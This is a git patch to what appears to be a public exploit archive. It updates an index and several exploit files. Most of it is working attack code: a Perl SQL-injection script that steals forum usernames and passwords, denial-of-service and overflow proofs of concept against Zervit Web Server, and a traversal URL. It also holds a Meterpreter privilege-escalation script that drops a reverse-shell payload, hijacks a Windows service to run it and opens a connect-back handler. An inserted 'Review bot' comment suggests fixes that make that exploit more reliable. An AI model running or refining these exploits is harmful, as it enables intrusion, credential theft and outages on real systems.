From a7c11413af371b872f5c50fda20c4b1fd775c225 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 Mar 2016 05:02:46 +0000 Subject: [PATCH] DB: 2016-03-09 1 new exploits --- files.csv | 22 +++--- platforms/php/webapps/2722.pl | 96 +++++++++++------------ platforms/windows/dos/8447.txt | 100 ++++++++++++------------ platforms/windows/dos/8500.py | 62 +++++++-------- platforms/windows/dos/8522.pl | 78 +++++++++--------- platforms/windows/local/11264.rb | 119 ++++++++++++++++++++++++++++ platforms/windows/remote/8463.txt | 54 ++++++------- platforms/windows/remote/8666.txt | 126 +++++++++++++++--------------- 8 files changed, 388 insertions(+), 269 deletions(-) create mode 100755 platforms/windows/local/11264.rb diff --git a/files.csv b/files.csv index 0d242b106..d5f4c3bac 100755 --- a/files.csv +++ b/files.csv 
@@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port
 2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0
 2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0
 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0
-2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
+2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0
 2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0
 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0
@@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
-8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
+8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0
@@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port
 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0
 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0
 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0
-8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
+8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0
 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0
 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0
@@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port
 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
 8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0
-8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
+8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
@@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port
 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
-8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
+8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
@@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port
 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0
 8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0
 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
-8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
+8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
 8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
@@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
-8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
+8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
-11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
+11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0
 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
-11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
+11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
 11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
 11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
@@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port
 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0
 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
-12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
-12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
+12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
+12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
diff --git a/platforms/php/webapps/2722.pl b/platforms/php/webapps/2722.pl
index 8be7cc497..aea5d8bea 100755
--- a/platforms/php/webapps/2722.pl
+++ b/platforms/php/webapps/2722.pl
@@ -1,48 +1,48 @@ -#!perl -use IO::Socket; -#Download:http://www.thewebdrivers.com/forum.zip -#By:Bl0od3r -#Germany =] -if (@ARGV<3) { -&header; -} else { -&get(); -} -sub get() { -$host=$ARGV[0]; -$path=$ARGV[1]; - $id=$ARGV[2]; -$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) -or die ("[-]Error\n"); -print "[~]Connecting!\n"; -print "[~]Getting Data!\n"; -print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n"; -print $socket "Host: $host\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; - -while ($ans=<$socket>) { -$ans=~ m/ Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:"; -$ans=~ m/(.*?)<\/td>/ && print "$1\n"; -if ($1) { -$success=1; } else { $success=0;}; -} -if ($success=="1") { -print "\n[+]Successed!"; - } else { -print "[-]Error"; - } - } -sub header() { -print -"--------------------------------------------------------------------\n"; -print "|\t---------->By Bl0od3r<---------\t\t\t\t |"; -print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |"; -print -"\n--------------------------------------------------------------------\n"; -exit; -} - -# greetz to all dc3 members,matrix_killer and skOd =] - -# milw0rm.com [2006-11-05] +#!perl +use IO::Socket; +#Download:http://www.thewebdrivers.com/forum.zip +#By:Bl0od3r +#Germany =] +if (@ARGV<3) { +&header; +} else { +&get(); +} +sub get() { +$host=$ARGV[0]; +$path=$ARGV[1]; + $id=$ARGV[2]; +$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) +or die ("[-]Error\n"); +print "[~]Connecting!\n"; +print "[~]Getting Data!\n"; +print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n"; +print $socket "Host: $host\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; + +while ($ans=<$socket>) 
{ +$ans=~ m/ Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:"; +$ans=~ m/(.*?)<\/td>/ && print "$1\n"; +if ($1) { +$success=1; } else { $success=0;}; +} +if ($success=="1") { +print "\n[+]Successed!"; + } else { +print "[-]Error"; + } + } +sub header() { +print +"--------------------------------------------------------------------\n"; +print "|\t---------->By Bl0od3r<---------\t\t\t\t |"; +print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |"; +print +"\n--------------------------------------------------------------------\n"; +exit; +} + +# greetz to all dc3 members,matrix_killer and skOd =] + +# milw0rm.com [2006-11-05] diff --git a/platforms/windows/dos/8447.txt b/platforms/windows/dos/8447.txt index 84126338e..b5be94fce 100755 --- a/platforms/windows/dos/8447.txt +++ b/platforms/windows/dos/8447.txt 
@@ -1,50 +1,50 @@ -#################### Zervit Webserver 0.02 Buffer Overflow ############################ - - -############### By: e.wiZz! - -###############Site: www.balcansecurity.com - - -############### Found with ServMeNot (world's sexiest fuzzer :P ) - - - -In the wild... - -######################################################################################## - -######Vend0r site: http://www.ohloh.net/projects/mereo - - -/* When requested uri isn't found,it goes to char tmp[255], -and later it is used to output,you need 256 chars to overflow (check source "http.c") */ - -using System; -using System.IO; -using System.Net; -using System.Text; - -class whatsoever -{ - static void Main() - { - // StringBuilder sb = new StringBuilder(); - - //byte[] buf = new byte[8192]; - - Console.WriteLine("Enter site: (http://localhost)"); - string sajt = Console.ReadLine(); - string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; - HttpWebRequest request = (HttpWebRequest) - - WebRequest.Create(sajt+uribad); - - HttpWebResponse response = (HttpWebResponse) - request.GetResponse(); - // you shouldn't see response - Console.WriteLine(sb.ToString()); - } -} - -// milw0rm.com [2009-04-15] +#################### Zervit Webserver 0.02 Buffer Overflow ############################ + + +############### By: e.wiZz! + +###############Site: www.balcansecurity.com + + +############### Found with ServMeNot (world's sexiest fuzzer :P ) + + + +In the wild... 
+ +######################################################################################## + +######Vend0r site: http://www.ohloh.net/projects/mereo + + +/* When requested uri isn't found,it goes to char tmp[255], +and later it is used to output,you need 256 chars to overflow (check source "http.c") */ + +using System; +using System.IO; +using System.Net; +using System.Text; + +class whatsoever +{ + static void Main() + { + // StringBuilder sb = new StringBuilder(); + + //byte[] buf = new byte[8192]; + + Console.WriteLine("Enter site: (http://localhost)"); + string sajt = Console.ReadLine(); + string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; + HttpWebRequest request = (HttpWebRequest) + + WebRequest.Create(sajt+uribad); + + HttpWebResponse response = (HttpWebResponse) + request.GetResponse(); + // you shouldn't see response + Console.WriteLine(sb.ToString()); + } +} + +// milw0rm.com [2009-04-15] diff --git a/platforms/windows/dos/8500.py b/platforms/windows/dos/8500.py index b2f259a00..aa7f150e8 100755 --- a/platforms/windows/dos/8500.py +++ b/platforms/windows/dos/8500.py 
@@ -1,31 +1,31 @@ -import socket -import sys - -print "------------------------------------------------------" -print " Zervit Webserver 0.3 Remote Denial Of Service " -print " url: http://zervit.sourceforge.net " -print " " -print " author: shinnai " -print " mail: shinnai[at]autistici[dot]org " -print " site: http://www.shinnai.net " -print " " -print " greets to: e.wiZz! for inspiration. Be safe man... " -print " " -print " dedicated to: all those tried to own my site :-p " -print "------------------------------------------------------" - -host = "127.0.0.1" -port = 80 - -try: - buff = "//.\\" * 330 - request = "GET " + buff + " HTTP/1.0" - connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connection.connect((host, port)) - connection.send(request) - raw_input('\n\nExploit completed. Press "Enter" to quit...') - sys.exit -except: - raw_input('\n\nUnable to connect. Press "Enter" to quit...') - -# milw0rm.com [2009-04-21] +import socket +import sys + +print "------------------------------------------------------" +print " Zervit Webserver 0.3 Remote Denial Of Service " +print " url: http://zervit.sourceforge.net " +print " " +print " author: shinnai " +print " mail: shinnai[at]autistici[dot]org " +print " site: http://www.shinnai.net " +print " " +print " greets to: e.wiZz! for inspiration. Be safe man... " +print " " +print " dedicated to: all those tried to own my site :-p " +print "------------------------------------------------------" + +host = "127.0.0.1" +port = 80 + +try: + buff = "//.\\" * 330 + request = "GET " + buff + " HTTP/1.0" + connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connection.connect((host, port)) + connection.send(request) + raw_input('\n\nExploit completed. Press "Enter" to quit...') + sys.exit +except: + raw_input('\n\nUnable to connect. Press "Enter" to quit...') + +# milw0rm.com [2009-04-21] diff --git a/platforms/windows/dos/8522.pl b/platforms/windows/dos/8522.pl index 6a67345c7..7f61b343b 100755 
--- a/platforms/windows/dos/8522.pl +++ b/platforms/windows/dos/8522.pl @@ -1,39 +1,39 @@ -#!/usr/bin/perl -# -# Zervit HTTP Server <= v0.3 Remote Denial of Service. -# -# -------------------------------------------------------------------- -# The vulnerability is caused due to an error in multi-socket. -# This can be exploited to crash the HTTP service. -# -------------------------------------------------------------------- -# -# Author: Jonathan Salwan -# Mail: submit [AT] shell-storm.org -# Web: http://www.shell-storm.org - - -use IO::Socket; -print "[+] Author : Jonathan Salwan\n"; -print "[+] Soft : Zervit 0.3 Remote DoS\n"; - - if (@ARGV < 1) - { - print "[-] Usage: \n"; - print "[-] Exemple: file.pl 127.0.0.1 80\n"; - exit; - } - - - $ip = $ARGV[0]; - $port = $ARGV[1]; - -print "[+] Sending request...\n"; - -for($i=0;$i=4;$i++) -{ -$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n"; - - print $socket "GET \x11 HTTP/1.0\n\r\n"; -} - -# milw0rm.com [2009-04-22] +#!/usr/bin/perl +# +# Zervit HTTP Server <= v0.3 Remote Denial of Service. +# +# -------------------------------------------------------------------- +# The vulnerability is caused due to an error in multi-socket. +# This can be exploited to crash the HTTP service. +# -------------------------------------------------------------------- +# +# Author: Jonathan Salwan +# Mail: submit [AT] shell-storm.org +# Web: http://www.shell-storm.org + + +use IO::Socket; +print "[+] Author : Jonathan Salwan\n"; +print "[+] Soft : Zervit 0.3 Remote DoS\n"; + + if (@ARGV < 1) + { + print "[-] Usage: \n"; + print "[-] Exemple: file.pl 127.0.0.1 80\n"; + exit; + } + + + $ip = $ARGV[0]; + $port = $ARGV[1]; + +print "[+] Sending request...\n"; + +for($i=0;$i=4;$i++) +{ +$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n"; + + print $socket "GET \x11 HTTP/1.0\n\r\n"; +} + +# milw0rm.com [2009-04-22] 
diff --git a/platforms/windows/local/11264.rb b/platforms/windows/local/11264.rb
new file mode 100755
index 000000000..29c6ce597
--- /dev/null
+++ b/platforms/windows/local/11264.rb
@@ -0,0 +1,119 @@
+##
+# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
+#
+# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
+# Due to an empty security descriptor, a local attacker can gain elevated privileges.
+# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
+# Vulnerability mitigation featured.
+#
+# Credit:
+# - Discovery - Nine:Situations:Group::bellick
+# - Meterpreter script - Trancer
+#
+# References:
+# - http://retrogod.altervista.org/9sg_south_river_priv.html
+# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
+# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
+# - http://osvdb.org/show/osvdb/59080
+#
+# mtrancer[@]gmail.com
+# http://www.rec-sec.com
+##
+
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+ "-h" => [ false, "This help menu"],
+ "-m" => [ false, "Mitigate"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+sname = 'WebDriveService'
+pname = 'wdService.exe'
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+ case opt
+ when "-h"
+ print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ when "-m"
+ client.sys.process.get_processes().each do |m|
+ if ( m['name'] == pname )
+ print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+
+ # Set correct service security descriptor to mitigate the vulnerability
+ print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
+ client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+ end
+ end
+ raise Rex::Script::Completed
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
+end
+
+client.sys.process.get_processes().each do |m|
+ if ( m['name'] == pname )
+
+ print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+
+ # Build out the exe payload.
+ pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+ pay.datastore['LHOST'] = rhost
+ pay.datastore['LPORT'] = rport
+ raw = pay.generate
+
+ exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+
+ # Place our newly created exe in %TEMP%
+ tempdir = client.fs.file.expand_path("%TEMP%")
+ tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+ print_status("Sending EXE payload '#{tempexe}'.")
+ fd = client.fs.file.new(tempexe, "wb")
+ fd.write(exe)
+ fd.close
+
+ # Stop the vulnerable service
+ print_status("Stopping service \"#{sname}\"...")
+ client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+ # Set exe payload as service binpath
+ print_status("Setting \"#{sname}\" to #{tempexe}...")
+ client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
+ sleep(1)
+
+ # Restart the service
+ print_status("Restarting the \"#{sname}\" service...")
+ client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+ # Our handler to recieve the callback.
+ handler = client.framework.exploits.create("multi/handler")
+ handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+ handler.datastore['LHOST'] = rhost
+ handler.datastore['LPORT'] = rport
+ handler.datastore['ExitOnSession'] = false
+
+ handler.exploit_simple(
+ 'Payload' => handler.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+ )
+
+ # Set service binpath back to normal
+ client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
+
+ end
+end
diff --git a/platforms/windows/remote/8463.txt b/platforms/windows/remote/8463.txt
index ad89c0632..9479004ba 100755
--- a/platforms/windows/remote/8463.txt
+++ b/platforms/windows/remote/8463.txt
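Review bot: The restore step on the last `client.sys.process.execute` line passes `binpath= %ProgramFiles%\\WebDrive\\#{pname}` with no quoting, so once cmd.exe expands `%ProgramFiles%` to a path containing a space, `sc` receives the value split across two arguments and either rejects the call or leaves the service pointing at a truncated path — the script would leave behind exactly the unquoted-service-path condition a cleanup step should avoid. The original binary path is also assumed rather than read, so a non-default install directory gets the wrong value even once quoting is fixed; capture `BINARY_PATH_NAME` from `sc qc "#{sname}"` before the first `sc config` and restore that, with the inner quotes sc expects: `client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= \"\\\"#{orig_binpath}\\\"\"", nil, {'Hidden' => 'true'})`. The same unquoted form is used when `tempexe` is installed as the binpath, which presumably only works because `%TEMP%` expanded without spaces on the tested XP host. Separately, `execute` does not appear to wait for the spawned cmd.exe, so the revert may race the `sc start` it follows, and the dropped payload at `tempexe` is never removed — a `sc query`-based wait before reverting and a `client.fs.file.rm(tempexe)` after the session arrives would make the mitigation/cleanup story the header advertises actually hold.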
@@ -1,27 +1,27 @@ -#################### Zervit Webserver Directory Traversal ############################ - - -############### By: e.wiZz! - -###############Site: www.balcansecurity.com - - -############### Found with ServMeNot (world's sexiest fuzzer :P ) - - - -In the wild... - -######################################################################################## - -#Site: http://zervit.sourceforge.net/ - -#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings. -It is being developed thinking in the people that will make use of it and tries to make itself intuitive. -It aims to make file sharing or displaying a web easier than the current servers do. - -#Vulnerability: - -http://[site]/../../../../../../boot.ini - -# milw0rm.com [2009-04-16] +#################### Zervit Webserver Directory Traversal ############################ + + +############### By: e.wiZz! + +###############Site: www.balcansecurity.com + + +############### Found with ServMeNot (world's sexiest fuzzer :P ) + + + 